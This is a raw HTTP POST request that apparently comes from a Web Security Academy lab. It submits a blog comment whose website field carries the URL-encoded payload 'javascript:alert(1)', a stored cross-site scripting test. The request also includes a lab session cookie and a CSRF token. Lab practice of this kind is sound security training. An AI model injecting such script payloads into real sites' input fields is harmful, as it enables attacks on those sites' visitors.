POST /post/comment HTTP/2
Host: 0aba003304c773848100e3590086003f.web-security-academy.net
Cookie: session=kpLPRbjFVHJtUNvLV2D3B4tQZ3yrST0Q
Content-Length: 121
Cache-Control: max-age=0
Sec-Ch-Ua: "Microsoft Edge";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Origin: https://0aba003304c773848100e3590086003f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Edg/141.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aba003304c773848100e3590086003f.web-security-academy.net/post?postId=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close

csrf=DH8813eiGzyZw6iIQeQCJSnhPLkrTGLl&postId=5&comment=test1&name=test2&email=123%40123&website=javascript%3Aalert%281%29